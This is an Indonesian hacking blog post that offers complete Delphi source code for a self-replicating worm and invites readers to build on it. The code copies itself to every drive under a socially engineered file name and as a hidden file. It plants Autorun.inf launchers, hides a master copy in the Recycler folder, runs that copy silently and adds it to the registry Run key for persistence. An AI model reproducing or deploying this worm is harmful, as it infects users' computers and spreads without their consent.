,
Headlines News :
Home » , , , » Worm sederhana pake delphi dengan size sangat ringan

Worm sederhana pake delphi dengan size sangat ringan

Written By Unknown on Sabtu, 10 Desember 2011 | 17.38

lama ga muncul kembali lg gan dengan project worn ane :D  okey langsung saja….
klo didelphi utk membuat worm berukuran kecil cukup menggunakan Consule Application, dengan Aplikasi konsul worm yang dihasilkan akan berukuran jauh lebih kecil, untuk mempertahankan worm dimemory disini saya menggunakan perulangan repeat until ditambah fungsi sleep utk menghandlenya agar tidak boros memory..
worm ini sangat sederhana dgn membuat penggandaan disetiap drive dgn nama menggunakan teknik sosial enginering A.K.A soceng ^^ dan tentunya jg menggunakan autorun.inf, walaupun saat ini cara tersebut tdk ampuh lg..
utk teknik selanjutnya terserah kamu, gunakan kemampuan yg kamu miliki, saat dicompile ukuranya 47kb, dan saat di compress menggunakan UPX ukuranya jd lebih kecil 25kb (tanpa ikon & resource)..
berikut ini sourcecodenya, gunakan Project Consule Application..
program Project1;
uses
SysUtils,
Windows;
Procedure PesanVirus();
var
txt : TextFile;
begin
// Cek apakah ada pesan virus, jika tidak ada
if FileExists(‘C:\Pesan.txt’)=False then
begin // buat pesan ke drive C:
AssignFile(txt, ‘C:\Pesan.txt’);
ReWrite(txt);
WriteLn(txt, ‘Baca :’);
WriteLn(txt, ‘=======’);
WriteLn(txt, ‘wew perkenalkan saya zer03s’);
WriteLn(txt, ‘mau numpang mejeng disini’);
WriteLn(txt, ‘bolehkan’);
WriteLn(txt, ”);
WriteLn(txt, ‘cekidot!!!’);
WriteLn(txt, ‘assalamualaikom’);
CloseFile(txt);
end;
end;
Procedure Infeksi();
var
Drive: Char;
inf : TextFile;
begin
for Drive := ‘C’ to ‘Z’ do //Infeksi Drive C – Z
begin
try
//Check apakah ada file worm Bugil.exe, jika tdk ada
if (FileExists(Drive+’:\Bugil.exe’)=False)then
begin
//buat worm ke drive dengan nama Bugil.exe
Copyfile(pchar(ParamStr(0)), pchar(Drive+’:\Bugil.exe’), false);
//Setting Attributnya jd normal agar terlihat
FileSetAttr(Drive+’:\Bugil.exe’, FILE_ATTRIBUTE_NORMAL);
end;
//Check apakah ada file virus ~localtmp.exe (Buat Autorun), jika tdk ada
if (FileExists(Drive+’:\~localtmp.exe’)=False)then
begin
//buat virus ke drive dengan nama ~localtmp.exe
Copyfile(pchar(ParamStr(0)), pchar(Drive+’:\~localtmp.exe’), false);
//Setting Attributnya agar tersembunyi
FileSetAttr(Drive+’:\~localtmp.exe’, FILE_ATTRIBUTE_READONLY+FILE_ATTRIBUTE_SYSTEM+FILE_ATTRIBUTE_HIDDEN);
//Membuat Autorun.inf disetiap drive
FileSetAttr(Drive+’:\Autorun.inf’,FILE_ATTRIBUTE_NORMAL);
AssignFile(inf, Drive+’:\Autorun.inf’);
ReWrite(inf);
WriteLn(inf, ‘[Autorun]‘);
WriteLn(inf, ‘shellexecute=~localtmp.exe’);
CloseFile(inf);
FileSetAttr(Drive+’:\Autorun.inf’,FILE_ATTRIBUTE_HIDDEN+FILE_ATTRIBUTE_SYSTEM);
end;
except
end;
end;
end;
begin
//cek apakah sudah ada file induk virus apa belum, jika tdk ada
if FileExists(‘C:\RECYCLER\zer03s.exe’) = False then
begin
// buat file induk di C:\RECYCLER\Sapihost.exe
Copyfile(pchar(ParamStr(0)), pchar(‘C:\RECYCLER\zer03s.exe’), false);
//Setting attribunya menjadi hidden dan system
FileSetAttr(‘C:\RECYCLER\zer03s.exe’, FILE_ATTRIBUTE_READONLY+FILE_ATTRIBUTE_SYSTEM+FILE_ATTRIBUTE_HIDDEN);
end;
//Cek jika worm yg dijalankan bukan nama file induknya
If ExtractFileName(ParamStr(0)) <> ‘zer03s.exe’ then
begin
//Jalankan diam-diam file induk utama yg ada di C:\RECYCLER\zer03s.exe
WinExec(‘C:\RECYCLER\zer03s.exe’,SW_HIDE);
//Yang bukan file induk akhiri proses, jd yg aktif cuma file induk
FatalExit(0);
FatalExit(1);
end;
//Cek lagi jika file induk yg dijalankan bernama file induk ‘zer03s.exe’ maka
If ExtractFileName(ParamStr(0)) = ‘zer03s.exe’ then
begin
// buat perulangan menggunakan repeat until, proses berulang-ulang
repeat
sleep(30000); //Pause 30 detik = 30000
Pesanworm; //Buat pesan worm
Infeksi; //Penginfeksian
// Membuat startup file induk menggunakan perintah REG ADD
WinExec(‘REG ADD “HKCU\Software\Microsoft\Windows\CurrentVersion\Run” /v “zer03s” /f /t REG_SZ /d “C:\RECYCLER\zer03s.exe”‘,SW_HIDE);
until false;
// dengan menggunakan perulangan maka proses worm akan tetap aktif dimemory
end;
end.// Sekian

terimakasih by admin : h3ykh3nd
Anda sedang membaca artikel tentang Worm sederhana pake delphi dengan size sangat ringan dan anda bisa menemukan artikel Worm sederhana pake delphi dengan size sangat ringan ini dengan url http://hy-hack.blogspot.com/2011/12/worm-sederhana-pake-delphi-dengan-size.html,Dilarang menduplikat artikel ini Worm sederhana pake delphi dengan size sangat ringan jika sangat bermanfaat hanya boleh sebagai artikel refrensi atau harus mengulas nya dengan bahasa / kalimat yang berbeda dan memberi link ini : Worm sederhana pake delphi dengan size sangat ringan


Artikel Terkait:

Share this post :
 
Support : Abaut Us | Contact Us | Privacy Policy | Term of Use | Redaksi | Advertise | Lowongan Kerja | Forum | Tabloit | Mobile Version | Hy Hack Toolbar
Copyright © 2011. HY hack - All Rights Reserved Template Created by Heykhend
Published by Heykhend Corp. Developed by PT Heykhend Publik Media (HPM)